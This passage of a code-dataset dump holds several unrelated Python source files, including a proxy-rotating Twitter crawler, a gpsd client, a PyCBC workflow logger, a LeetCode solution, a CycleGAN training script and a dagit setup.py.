t.text.encode('utf-8') + '\\t' + str(t.retweets) + '\\t' + str(t.favorites)\n\t\t\t+ '\\t' + t.hashtags.encode('utf-8') + '\\t' + t.mentions.encode('utf-8') + '\\t' + t.permalink.encode('utf-8') + '\\n')\n\treturn True\n\n#Copied from the source code of Shadowsocks, to cross the GFW.\ndef deployProxy(configs, index):\n\tconfig = configs[index]\n\ttry:\n\t\tlogging.info(\"starting local at %s:%d\" % (config['local_address'], config['local_port']))\n\n\t\tdns_resolver = asyncdns.DNSResolver()\n\t\ttcp_server = tcprelay.TCPRelay(config, dns_resolver, True)\n\t\tudp_server = udprelay.UDPRelay(config, dns_resolver, True)\n\t\tloop = 
eventloop.EventLoop()\n\t\tdns_resolver.add_to_loop(loop)\n\t\ttcp_server.add_to_loop(loop)\n\t\tudp_server.add_to_loop(loop)\n\n\t\tdef handler(signum, _):\n\t\t\tlogging.warn('received SIGQUIT, doing graceful shutting down..')\n\t\t\ttcp_server.close(next_tick=True)\n\t\t\tudp_server.close(next_tick=True)\n\t\tsignal.signal(getattr(signal, 'SIGQUIT', signal.SIGTERM), handler)\n\n\t\tdef int_handler(signum, _):\n\t\t\tsys.exit(1)\n\t\tsignal.signal(signal.SIGINT, int_handler)\n\n\t\tdaemon.set_user(config.get('user', None))\n\t\tloop.run()\n\texcept Exception as e:\n\t\traise\n\nif __name__ == '__main__':\n\t#search condition\n\tstart_date = date(2015, 2, 1)\n\tend_date = date(2015, 2, 2)\n\tcompany = '$aapl'\n\tlang = 'en'\n\n\t#load Socks5 proxy settings\n\t#(in proxy-configs, where I stored some proxys I used to cross the GFW,\n\t#maybe you don't need it in America)\n\tf = open('proxy-configs', 'rb')\n\tconfigs = pickle.load(f)\n\tf.close()\n\n\t#open the file to save\n\tf = open('aapl-test', 'w')\n\tn = 0\n\tindex = random.randint(0, len(configs) - 1)\n\tindex = 0\n\n\t#As Twitter may block the crawler, the proxy is changed randomly\n\t#after crawling 1 day's tweets\n\twhile n <= int((end_date - start_date).days):\n\t\told_index = index\n\t\tindex = random.randint(0, len(configs) - 1)\n\n\n\t\twhile (index == old_index):\n\t\t\tindex = random.randint(0, len(configs) - 1)\n\n\t\tsingle_date = start_date + timedelta(n)\n\n\t\tp = multiprocessing.Process(target = deployProxy, args = (configs, index))\n\t\tprint('Using Proxy: %s' % configs[index]['remarks'])\n\t\tp.start()\n\t\tsleep(3)\n\t\tprint(\"crawling %s...\" % strftime(\"%Y-%m-%d\", single_date.timetuple()))\n\n\t\tr = crawl1DayTweet(f, single_date, company, lang)\n\t\tif r:\n\t\t\tprint(\"%s done.\" % strftime(\"%Y-%m-%d\", single_date.timetuple()))\n\t\t\tn += 1\n\n\t\tp.terminate()\n\tf.close()\n\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253875317","text":"import socket\nimport json\nimport logging\nimport datetime\n\ngpsd_socket = None\ngpsd_stream = None\nstate = {}\ngpsTimeFormat = '%Y-%m-%dT%H:%M:%S.%fZ'\n\nlogger = logging.getLogger(__name__)\n\n\ndef _parse_state_packet(json_data):\n global state\n if json_data['class'] == 'DEVICES':\n if not json_data['devices']:\n logger.warn('No gps devices found')\n state['devices'] = json_data\n elif json_data['class'] == 'WATCH':\n state['watch'] = json_data\n else:\n raise Exception(\n \"Unexpected message received from gps: {}\".format(json_data['class']))\n\n\nclass NoFixError(Exception):\n pass\n\n\nclass GpsResponse(object):\n def __init__(self):\n self.mode = 0\n self.sats = 0\n self.sats_valid = 0\n self.lon = 0.0\n self.lat = 0.0\n self.alt = 0.0\n self.track = 0\n self.hspeed = 0\n self.climb = 0\n self.time = ''\n self.error = {}\n\n @classmethod\n def from_json(cls, packet):\n result = cls()\n if not packet['active']:\n raise UserWarning('GPS not active')\n last_tpv = packet['tpv'][-1]\n last_sky = packet['sky'][-1]\n\n if 'satellites' in last_sky:\n result.sats = len(last_sky['satellites'])\n result.sats_valid = len(\n [sat for sat in last_sky['satellites'] if sat['used'] == True])\n else:\n result.sats = 0;\n result.sats_valid = 0;\n\n result.mode = last_tpv['mode']\n\n if last_tpv['mode'] >= 2:\n result.lon = last_tpv['lon'] if 'lon' in last_tpv else 0.0\n result.lat = last_tpv['lat'] if 'lat' in last_tpv else 0.0\n 
result.track = last_tpv['track'] if 'track' in last_tpv else 0\n result.hspeed = last_tpv['speed'] if 'speed' in last_tpv else 0\n result.time = last_tpv['time'] if 'time' in last_tpv else ''\n result.error = {\n 'c': 0,\n 's': last_tpv['eps'] if 'eps' in last_tpv else 0,\n 't': last_tpv['ept'] if 'ept' in last_tpv else 0,\n 'v': 0,\n 'x': last_tpv['epx'] if 'epx' in last_tpv else 0,\n 'y': last_tpv['epy'] if 'epy' in last_tpv else 0\n }\n\n if last_tpv['mode'] >= 3:\n result.alt = last_tpv['alt'] if 'alt' in last_tpv else 0.0\n result.climb = last_tpv['climb'] if 'climb' in last_tpv else 0\n result.error['c'] = last_tpv['epc'] if 'epc' in last_tpv else 0\n result.error['v'] = last_tpv['epv'] if 'epv' in last_tpv else 0\n\n return result\n\n def position(self):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n return self.lat, self.lon\n\n def altitude(self):\n if self.mode < 3:\n raise NoFixError(\"Needs at least 3D fix\")\n return self.alt\n\n def movement(self):\n if self.mode < 3:\n raise NoFixError(\"Needs at least 3D fix\")\n return {\"speed\": self.hspeed, \"track\": self.track, \"climb\": self.climb}\n\n def speed_vertical(self):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n if abs(self.climb) < self.error['c']:\n return 0\n else:\n return self.climb\n\n def speed(self):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n if self.hspeed < self.error['s']:\n return 0\n else:\n return self.hspeed\n\n def position_precision(self):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n return max(self.error['x'], self.error['y']), self.error['v']\n\n def map_url(self):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n return \"http://www.openstreetmap.org/?mlat={}&mlon={}&zoom=15\".format(self.lat, self.lon)\n\n def get_time(self, local_time=False):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n time = datetime.datetime.strptime(self.time, gpsTimeFormat)\n\n if local_time:\n time = time.replace(tzinfo=datetime.timezone.utc).astimezone()\n\n return time\n\n def __repr__(self):\n modes = {\n 0: 'No mode',\n 1: 'No fix',\n 2: '2D fix',\n 3: '3D fix'\n }\n if self.mode < 2:\n return \"\".format(modes[self.mode])\n if self.mode == 2:\n return \"\".format(self.lat, self.lon)\n if self.mode == 3:\n return \"\".format(self.lat, self.lon, self.alt)\n\n\ndef connect(host=\"127.0.0.1\", port=2947):\n global gpsd_socket, gpsd_stream, verbose_output, state\n logger.debug(\"Connecting to gpsd socket at {}:{}\".format(host, port))\n gpsd_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n gpsd_socket.connect((host, port))\n gpsd_stream = gpsd_socket.makefile(mode=\"rw\")\n logger.debug(\"Waiting for welcome message\")\n welcome_raw = gpsd_stream.readline()\n welcome = json.loads(welcome_raw)\n if welcome['class'] != \"VERSION\":\n raise Exception(\n \"Unexpected data received as welcome. 
Is the server a gpsd 3 server?\")\n logger.debug(\"Enabling gps\")\n gpsd_stream.write('?WATCH={\"enable\":true}\\n')\n gpsd_stream.flush()\n\n for i in range(0, 2):\n raw = gpsd_stream.readline()\n parsed = json.loads(raw)\n _parse_state_packet(parsed)\n\n\ndef get_current():\n global gpsd_stream, verbose_output\n logger.debug(\"Polling gps\")\n gpsd_stream.write(\"?POLL;\\n\")\n gpsd_stream.flush()\n raw = gpsd_stream.readline()\n response = json.loads(raw)\n if response['class'] != 'POLL':\n raise Exception(\n \"Unexpected message received from gps: {}\".format(response['class']))\n return GpsResponse.from_json(response)\n\n\ndef device():\n global state\n return {\n 'path': state['devices']['devices'][0]['path'],\n 'speed': state['devices']['devices'][0]['bps'],\n 'driver': state['devices']['devices'][0]['driver']\n }","sub_path":"mesh-code/gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"3850691","text":"# Copyright (C) 2014 Ian Harry\n#\n# This program is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation; either version 3 of the License, or (at your\n# option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General\n# Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\n#\n# =============================================================================\n#\n# Preamble\n#\n# =============================================================================\n#\n\n\"\"\"\nThis module is responsible for creating any files that log what the workflow\nhas done. This includes command line options sent to the workflow, analysis\ntimes used within the workflow, etc.\nhttps://ldas-jobs.ligo.caltech.edu/~cbc/docs/pycbc/NOTYETCREATED.html\n\"\"\"\n\nimport logging\nfrom pycbc.workflow.core import File, FileList, make_analysis_dir\nfrom glue.ligolw import ligolw, utils\nfrom glue.ligolw.utils import process\nfrom glue.segmentdb import segmentdb_utils\nfrom glue.segments import segmentlist\n\ndef setup_analysislogging(workflow, segs_list, insps, args, output_dir,\n program_name=\"workflow\", tags=[]):\n \"\"\"\n This module sets up the analysis logging xml file that contains the\n following information:\n\n * Command line arguments that the code was run with\n * Segment list of times marked as SCIENCE\n * Segment list of times marked as SCIENCE and \"OK\" ie. not CAT_1 vetoed\n * Segment list of times marked as SCIENCE_OK and present on the cluster\n * The times that will be analysed by the matched-filter jobs\n\n Parameters\n -----------\n workflow : pycbc.workflow.core.Workflow\n The Workflow instance.\n segs_list : pycbc.workflow.core.FileList\n A list of Files containing the information needed to generate the\n segments above. For segments generated at run time the associated\n segmentlist is a property of this object.\n insps : pycbc.workflow.core.FileList\n The output files from the matched-filtering module. 
Used to identify\n what times have been analysed in this workflow.\n output_dir : path\n Directory to output any files to.\n program_name : string (optional, default = \"workflow\")\n The program name to stick in the process/process_params tables.\n tags : list (optional, default = [])\n If given restrict to considering inspiral and segment files that\n are tagged with all tags in this list.\n \"\"\"\n logging.info(\"Entering analysis logging module.\")\n make_analysis_dir(output_dir)\n\n # Construct the summary XML file\n outdoc = ligolw.Document()\n outdoc.appendChild(ligolw.LIGO_LW())\n\n # Add process and process_params tables\n proc_id = process.register_to_xmldoc(outdoc, program_name,\n vars(args) ).process_id\n\n # Now add the various segment lists to this file\n summ_segs = segmentlist([workflow.analysis_time])\n \n # If tags is given filter by tags\n if tags:\n for tag in tags:\n segs_list = segs_list.find_output_with_tag(tag)\n insps = insps.find_output_with_tag(tag)\n\n for ifo in workflow.ifos:\n # Lets get the segment lists we need\n seg_ifo_files = segs_list.find_output_with_ifo(ifo)\n # SCIENCE\n sci_seg_file = seg_ifo_files.find_output_with_tag('SCIENCE')\n if len(sci_seg_file) == 1:\n sci_seg_file = sci_seg_file[0]\n sci_segs = sci_seg_file.segmentList\n sci_def_id = segmentdb_utils.add_to_segment_definer(outdoc, proc_id,\n ifo, \"CBC_WORKFLOW_SCIENCE\", 0)\n segmentdb_utils.add_to_segment(outdoc, proc_id, sci_def_id,\n sci_segs)\n segmentdb_utils.add_to_segment_summary(outdoc, proc_id, sci_def_id,\n summ_segs, comment='')\n elif sci_seg_file:\n err_msg = \"Got %d files matching %s and %s. Expected 1 or 0.\" \\\n %(len(sci_seg_file), ifo, 'SCIENCE')\n raise ValueError(err_msg)\n\n # SCIENCE_OK\n sci_ok_seg_file = seg_ifo_files.find_output_with_tag('SCIENCE_OK')\n if len(sci_ok_seg_file) == 1:\n sci_ok_seg_file = sci_ok_seg_file[0]\n sci_ok_segs = sci_ok_seg_file.segmentList\n sci_ok_def_id = segmentdb_utils.add_to_segment_definer(outdoc,\n proc_id, ifo, \"CBC_WORKFLOW_SCIENCE_OK\", 0)\n segmentdb_utils.add_to_segment(outdoc, proc_id, sci_ok_def_id,\n sci_ok_segs)\n segmentdb_utils.add_to_segment_summary(outdoc, proc_id,\n sci_ok_def_id, summ_segs, comment='')\n elif sci_ok_seg_file:\n err_msg = \"Got %d files matching %s and %s. Expected 1 or 0.\" \\\n %(len(sci_ok_seg_file), ifo, 'SCIENCE_OK')\n raise ValueError(err_msg)\n\n\n # SCIENCE_AVAILABLE\n sci_available_seg_file = seg_ifo_files.find_output_with_tag(\\\n 'SCIENCE_AVAILABLE')\n if len(sci_available_seg_file) == 1:\n sci_available_seg_file = sci_available_seg_file[0]\n sci_available_segs = sci_available_seg_file.segmentList\n sci_available_def_id = segmentdb_utils.add_to_segment_definer(\\\n outdoc, proc_id, ifo, \"CBC_WORKFLOW_SCIENCE_AVAILABLE\", 0)\n segmentdb_utils.add_to_segment(outdoc, proc_id,\n sci_available_def_id, sci_available_segs)\n segmentdb_utils.add_to_segment_summary(outdoc, proc_id,\n sci_available_def_id, summ_segs, comment='')\n elif sci_available_seg_file:\n err_msg = \"Got %d files matching %s and %s. 
Expected 1 or 0.\" \\\n %(len(sci_available_seg_file), ifo, 'SCIENCE_AVAILABLE')\n raise ValueError(err_msg)\n\n # ANALYSABLE - This one needs to come from inspiral outs\n ifo_insps = insps.find_output_with_ifo(ifo)\n analysable_segs = ifo_insps.get_times_covered_by_files()\n\n analysable_def_id = segmentdb_utils.add_to_segment_definer(outdoc,\n proc_id, ifo, \"CBC_WORKFLOW_ANALYSABLE\", 0)\n segmentdb_utils.add_to_segment(outdoc, proc_id, analysable_def_id,\n analysable_segs)\n segmentdb_utils.add_to_segment_summary(outdoc, proc_id,\n analysable_def_id, summ_segs, comment='')\n\n summ_file = File(workflow.ifos, \"WORKFLOW_SUMMARY\",\n workflow.analysis_time, extension=\".xml\",\n directory=output_dir)\n summ_file.PFN(summ_file.storage_path, site='local')\n utils.write_filename(outdoc, summ_file.storage_path)\n\n return FileList([summ_file])\n\n","sub_path":"pycbc/workflow/analysislogging.py","file_name":"analysislogging.py","file_ext":"py","file_size_in_byte":7502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"270229786","text":"# Duplicate Zeros\n# Given a fixed length array arr of integers, duplicate each occurrence of zero, shifting the remaining elements to the right.\n# Note that elements beyond the length of the original array are not written.\n# Do the above modifications to the input array in place, do not return anything from your function.\n\nclass Solution:\n def duplicateZeros(self, arr: List[int]) -> None:\n \"\"\"\n Do not return anything, modify arr in-place instead.\n \"\"\"\n tmp = 0\n l = len(arr) - 1\n for i in range(l + 1):\n if i + tmp > l:\n break\n \n if arr[i] == 0:\n if i == l - tmp:\n arr[l] = 0\n l -= 1\n break\n tmp += 1\n\n last = l - tmp\n\n for i in range(last, -1, -1):\n if arr[i] == 0:\n arr[i + tmp] = 0\n tmp -= 1\n arr[i + tmp] = 0\n else:\n arr[i + tmp] = arr[i]\n","sub_path":"task04.py","file_name":"task04.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"626809999","text":"#######################################################################################\n# Title: CycleGAN\n# Author: [A_K_Nain](https://twitter.com/A_K_Nain)\n# Date created: 2020/08/12\n# Last modified: 2020/08/12\n# Description: Implementation of CycleGAN.\n#\n# CycleGAN\n#\n# CycleGAN is a model that aims to solve the image-to-image translation\n# problem. The goal of the image-to-image translation problem is to learn the\n# mapping between an input image and an output image using a training set of\n# aligned image pairs. However, obtaining paired examples isn't always feasible.\n# CycleGAN tries to learn this mapping without requiring paired input-output images,\n# using cycle-consistent adversarial networks.\n#\n# - [Paper](https://arxiv.org/pdf/1703.10593.pdf)\n# - [Original implementation](https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix)\n#######################################################################################\n# Copyright (C) 2020-2021 Habana Labs, Ltd. 
an Intel Company\n#######################################################################################\n\nimport os\nimport re\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow_addons as tfa\nimport tensorflow_datasets as tfds\nfrom tensorflow.data.experimental import AUTOTUNE as autotune\n\nfrom TensorFlow.common.tb_utils import TensorBoardWithHParamsV2, ExamplesPerSecondKerasHookV2\nfrom TensorFlow.common.debug import dump_callback\nfrom habana_frameworks.tensorflow.ops.instance_norm import HabanaInstanceNormalization\nfrom arguments import CycleGANArgParser\nfrom data import TrasformInputs\nfrom modeling import get_discriminator, get_resnet_generator, CycleGan, TFPool\nfrom monitoring import GANMonitor\nfrom loss import get_adversarial_losses_fn\n\n\ndef is_master(use_hvd, horovod):\n return use_hvd is False or horovod.rank() == 0\n\n\ndef is_local_master(use_hvd, horovod):\n return use_hvd is False or horovod.local_rank() == 0\n\n\ndef train(args, cycle_gan_model, train_ds, test_ds, checkpoint=None, horovod=None):\n gen_X = cycle_gan_model.gen_X\n gen_Y = cycle_gan_model.gen_Y\n cycle_loss_fn = keras.losses.MeanAbsoluteError()\n id_loss_fn = keras.losses.MeanAbsoluteError()\n discriminator_loss_fn, generator_loss_fn = get_adversarial_losses_fn(\n 'lsgan')\n\n lr_opts = dict(\n gen_optimizer=args.generator_lr,\n disc_optimizer=args.discriminator_lr,\n )\n\n if args.use_horovod:\n for k in lr_opts.keys():\n lr_opts[k] *= horovod.size()\n\n # Callbacks\n hooks = []\n if args.use_hooks and (args.log_all_workers or is_local_master(args.use_horovod, horovod)):\n\n hparams = {\n 'batch_size': args.batch_size,\n 'precision': args.data_type,\n 'epochs': args.epochs,\n 'logdir': args.logdir,\n 'hvd_workers': args.hvd_workers\n }\n tb = TensorBoardWithHParamsV2(\n hparams, log_dir=os.path.join(args.logdir, \"train\"))\n examples_per_sec = ExamplesPerSecondKerasHookV2(\n output_dir=os.path.join(args.logdir, \"train\"), batch_size=args.batch_size)\n\n # Apply the preprocessing operations to the test data\n file_writer_imgs = tf.summary.create_file_writer(\n os.path.join(args.logdir, 'imgs'))\n plotter = GANMonitor(\n file_writer_imgs, test_ds[0], test_ds[1], freq=args.monitor_freq)\n steps_per_epoch = int(train_ds.reduce(0, lambda x, _: x+1).numpy()\n ) if args.steps_per_epoch is None else args.steps_per_epoch\n save_every_n_steps = args.save_freq*steps_per_epoch\n checkpoint_filename = \"cyclegan_checkpoints.{epoch:03d}\"\n hooks += [plotter, tb, examples_per_sec,\n keras.callbacks.ModelCheckpoint(filepath=os.path.join(args.logdir, checkpoint_filename), save_weights_only=True, save_freq=save_every_n_steps)]\n\n if not args.no_lr_optimizer:\n from scheduling import MultiOptimizerLR, CosineDecay\n scheduler_hook = MultiOptimizerLR(initial_lr=lr_opts,\n multiplier=CosineDecay(steps=args.epochs - args.cosine_decay_delay,\n clif=args.cosine_decay_delay))\n hooks += [scheduler_hook]\n\n start_epoch = 0\n if checkpoint:\n print(f'Resuming from {checkpoint}')\n start_epoch = int(re.search(r'[0-9]{3}', checkpoint)[0])\n cycle_gan_model.load_weights(checkpoint)\n else:\n print(f'Couldn\\'t find checkpoint at {args.logdir}')\n\n pool_F = None\n pool_G = None\n if args.pool_size > 0:\n print('Populating pool')\n pool_F = []\n pool_G = []\n for i, (A, B) in enumerate(train_ds):\n if i >= args.pool_size // args.batch_size:\n break\n pool_F.append(gen_X(A))\n pool_G.append(gen_Y(B))\n pool_F = TFPool(tf.concat(pool_F, 0), batch_size=args.batch_size)\n pool_G = 
TFPool(tf.concat(pool_G, 0), batch_size=args.batch_size)\n print(\n f'Done, sample count- F: {pool_F.pool.shape[0]}, G: {pool_G.pool.shape[0]}')\n\n cycle_gan_model.compile(\n gen_optimizer=keras.optimizers.Adam(\n learning_rate=lr_opts[\"gen_optimizer\"], beta_1=0.5),\n disc_optimizer=keras.optimizers.Adam(\n learning_rate=lr_opts[\"disc_optimizer\"], beta_1=0.5),\n gen_loss_fn=generator_loss_fn, cycle_loss=cycle_loss_fn, id_loss=id_loss_fn,\n disc_loss_fn=discriminator_loss_fn, hvd=horovod if args.use_horovod else None, pool_f=pool_F, pool_g=pool_G)\n print('Model is compiled, setting hooks')\n if is_local_master(args.use_horovod, horovod):\n print('Saving initial checkpoint')\n cycle_gan_model.save_weights(os.path.join(\n args.logdir, f'init_checkpoint.{start_epoch:03d}'))\n if args.use_horovod:\n horovod.broadcast_variables(cycle_gan_model.variables, 0)\n print('Start model training')\n with dump_callback(args.dumps_config):\n cycle_gan_model.fit(\n train_ds,\n epochs=args.epochs,\n initial_epoch=start_epoch,\n steps_per_epoch=args.steps_per_epoch,\n callbacks=hooks,\n verbose=is_master(args.use_horovod, horovod),\n )\n if is_local_master(args.use_horovod, horovod):\n print('Saving final checkpoint')\n cycle_gan_model.save_weights(os.path.join(\n args.logdir, f'final_checkpoint.{args.epochs:03d}'))\n\n\ndef eval(args, cycle_gan_model, test_ds, input_transformation, checkpoint=None):\n test_horses, test_zebras = test_ds\n # Load the checkpoints\n if not cycle_gan_model._is_compiled:\n cycle_gan_model.load_weights(checkpoint).expect_partial()\n print(\"Weights loaded successfully\")\n test_horses = (\n test_horses.map(input_transformation.preprocess_test_image,\n num_parallel_calls=autotune)\n .take(20).batch(1)\n )\n test_zebras = (\n test_zebras.map(input_transformation.preprocess_test_image,\n num_parallel_calls=autotune)\n .take(20).batch(1)\n )\n print('Running horses to zebras')\n test_image_path = os.path.join(\n args.logdir, 'test_images', 'horses_to_zebras')\n os.makedirs(test_image_path, exist_ok=True)\n for i, img in enumerate(test_horses):\n prediction = cycle_gan_model.gen_Y(img, training=False)\n prediction = input_transformation.denormalizer(prediction)\n prediction = keras.preprocessing.image.array_to_img(prediction[0])\n prediction.save(os.path.join(\n test_image_path, f\"predicted_img_{i}.png\"))\n print('Running zebras to horses')\n test_image_path = os.path.join(\n args.logdir, 'test_images', 'zebras_to_horses')\n os.makedirs(test_image_path, exist_ok=True)\n for i, img in enumerate(test_zebras):\n prediction = cycle_gan_model.gen_X(img, training=False)\n prediction = input_transformation.denormalizer(prediction)\n prediction = keras.preprocessing.image.array_to_img(prediction[0])\n prediction.save(os.path.join(\n test_image_path, f\"predicted_img_{i}.png\"))\n\n\ndef main():\n parser = CycleGANArgParser(is_demo=False)\n args = parser.parse_args()\n if not args.no_hpu:\n from habana_frameworks.tensorflow import load_habana_module\n load_habana_module()\n args.habana_instance_norm = False\n os.environ['TF_REWRITERS_CONFIG_FILE'] = 'rewriters_config'\n if args.habana_instance_norm:\n tfa.layers.InstanceNormalization = HabanaInstanceNormalization\n if args.data_type == 'bf16':\n tf.keras.mixed_precision.set_global_policy('mixed_bfloat16')\n if args.run_deterministic:\n tf.random.set_seed(12345)\n input_image_shape = (args.crop, args.crop, 3)\n input_transformation = TrasformInputs(orig_img_size=(\n args.resize, args.resize), input_img_size=(args.crop, args.crop))\n\n 
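# A minimal comment-only sketch of the cycle-consistency objective from the\n    # file header (the real losses are wired up in train() above, where\n    # cycle_loss_fn is keras.losses.MeanAbsoluteError(), here abbreviated mae):\n    #\n    #   cycle_loss = mae(x, gen_X(gen_Y(x))) + mae(y, gen_Y(gen_X(y)))\n    #\n    # i.e. each generator should invert the other on unpaired samples x and y.\n\n    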
horovod = None\n if args.use_horovod:\n from TensorFlow.common.horovod_helpers import hvd as horovod\n horovod.init()\n if args.log_all_workers:\n args.logdir = os.path.join(args.logdir, f\"worker_{horovod.rank()}\")\n\n tfds.disable_progress_bar()\n # Load the horse-zebra dataset using tensorflow-datasets.\n if is_local_master(args.use_horovod, horovod):\n dataset, _ = tfds.load(\"cycle_gan/horse2zebra\", data_dir=args.dataset_dir,\n with_info=True, as_supervised=True, download=True)\n if args.use_horovod:\n horovod.broadcast(0, 0) # nodes synchronization\n else:\n if args.use_horovod:\n horovod.broadcast(0, 0)\n dataset, _ = tfds.load(\n \"cycle_gan/horse2zebra\", data_dir=args.dataset_dir, with_info=True, as_supervised=True)\n\n train_horses, train_zebras = dataset[\"trainA\"], dataset[\"trainB\"]\n test_horses, test_zebras = dataset[\"testA\"], dataset[\"testB\"]\n\n # Apply the preprocessing operations to the training data\n train_horses = (\n train_horses.map(\n input_transformation.preprocess_train_image, num_parallel_calls=1 if args.run_deterministic else autotune)\n .cache()\n .shuffle(args.buffer)\n .batch(args.batch_size, drop_remainder=True)\n )\n train_zebras = (\n train_zebras.map(\n input_transformation.preprocess_train_image, num_parallel_calls=1 if args.run_deterministic else autotune)\n .cache()\n .shuffle(args.buffer)\n .batch(args.batch_size, drop_remainder=True)\n )\n train_ds = tf.data.Dataset.zip((train_horses, train_zebras))\n test_ds = test_horses, test_zebras\n\n disc_X = get_discriminator(input_image_shape, name=\"discriminator_X\")\n disc_Y = get_discriminator(input_image_shape, name=\"discriminator_Y\")\n gen_X = get_resnet_generator(input_image_shape, name=\"generator_X\")\n gen_Y = get_resnet_generator(input_image_shape, name=\"generator_Y\")\n\n # Create cycle gan model\n cycle_gan_model = CycleGan(\n generator_X=gen_X, generator_Y=gen_Y, discriminator_X=disc_X, discriminator_Y=disc_Y\n )\n\n latest = None\n if args.restore:\n print(f\"Trying to restore checkpoint from {args.logdir}\")\n latest = tf.train.latest_checkpoint(args.logdir)\n\n if args.train:\n train(args, cycle_gan_model, train_ds, test_ds, latest, horovod)\n\n if args.test and is_master(args.use_horovod, horovod):\n eval(args, cycle_gan_model, test_ds, input_transformation, latest)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"TensorFlow/computer_vision/CycleGAN/cycle_gan.py","file_name":"cycle_gan.py","file_ext":"py","file_size_in_byte":11552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"343889914","text":"import argparse\nimport sys\nimport os\n\nfrom setuptools import find_packages, setup\n\n# pylint: disable=E0401, W0611\nif sys.version_info[0] < 3:\n import __builtin__ as builtins\nelse:\n import builtins\n\n\ndef long_description():\n here = os.path.abspath(os.path.dirname(__file__))\n with open(os.path.join(here, 'README.rst'), 'r') as fh:\n return fh.read()\n\n\ndef get_version(name):\n version = {}\n with open(\"dagit/version.py\") as fp:\n exec(fp.read(), version) # pylint: disable=W0122\n\n if name == 'dagit':\n return version['__version__']\n else:\n return version['__version__'] + version['__nightly__']\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--nightly', action='store_true')\n\n\ndef _do_setup(name='dagit'):\n setup(\n name=name,\n version=get_version(name),\n author='Elementl',\n license='Apache-2.0',\n description='Web UI for dagster.',\n long_description=long_description(),\n 
long_description_content_type='text/markdown',\n url='https://github.com/dagster-io/dagster',\n classifiers=[\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n ],\n packages=find_packages(exclude=['dagit_tests']),\n include_package_data=True,\n install_requires=[\n # standard python 2/3 compatability things\n 'enum34>=1.1.6',\n 'future>=0.16.0',\n # cli\n # 'click>=6.7',\n # 'coloredlogs>=10.0',\n # 'graphviz>=0.8.3',\n 'pyyaml>=3.12',\n # core (not explicitly expressed atm)\n 'six>=1.11.0',\n # cli\n 'click>=6.7',\n # dagster\n # 'dagster>=0.3.0rc1',\n # FIXME: Temporarily loosen restriction while we work out kinks in publish process\n # See Issue #499\n 'dagster',\n # graphql\n 'graphql-core>=2.1',\n 'graphene>=2.1.3',\n # server\n 'Flask-GraphQL>=2.0.0',\n 'Flask-Sockets>=0.2.1',\n 'Flask>=1.0.2',\n 'flask-cors>=3.0.6',\n 'gevent-websocket==0.10.1',\n 'gevent==1.3.7',\n 'graphql-ws>=0.3.0',\n 'pyrsistent>=0.14.8',\n # watchdog\n 'watchdog>=0.8.3',\n # notebooks support\n 'nbconvert>=5.4.0',\n # dev/test - Installed via dev-requirements.txt\n # 'pylint>=1.8.4',\n # 'pytest>=3.5.1',\n # 'recommonmark>=0.4.0',\n # 'rope>=0.10.7',\n # 'Sphinx>=1.7.5',\n # 'sphinx-autobuild>=0.7.1',\n # 'yapf>=0.22.0',\n # 'twine>=1.11.0',\n # 'pre-commit'>=1.10.1',\n ],\n entry_points={\"console_scripts\": ['dagit = dagit.cli:main']},\n )\n\n\nif __name__ == '__main__':\n parsed, unparsed = parser.parse_known_args()\n sys.argv = [sys.argv[0]] + unparsed\n if parsed.nightly:\n _do_setup('dagit-nightly')\n else:\n _do_setup('dagit')\n","sub_path":"python_modules/dagit/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67281325","text":"import numpy as np\nfrom sakura.common.chunk import NumpyChunk\nfrom sakura.daemon.processing.tools import Registry\nfrom sakura.daemon.processing.cache import Cache\nfrom sakura.daemon.processing.column import Column\n\nclass OutputStreamBase(Registry):\n def __init__(self, label):\n self.columns = []\n self.label = label\n self.length = None\n self.range_iter_cache = Cache(10)\n def add_column(self, col_label, col_type, col_tags=()):\n return self.register(self.columns, Column,\n col_label, col_type, tuple(col_tags),\n self, len(self.columns))\n def pack(self):\n return dict(label = self.label,\n columns = self.columns,\n length = self.length)\n def get_range(self, row_start, row_end, columns=None, filters=()):\n chunk_len = row_end-row_start\n # try to reuse the last iterator\n it = self.range_iter_cache.get(row_start, row_end, columns, filters)\n in_cache = it is not None\n # otherwise, create a new iterator\n if not in_cache:\n stream = self\n if columns is not None:\n stream = stream.select_columns(*columns)\n for condition in filters:\n stream = stream.filter(condition)\n it = stream.chunks(chunk_len, row_start)\n # read next chunk and return it\n for chunk in it:\n # update info about last iterator\n new_row_start = row_start + 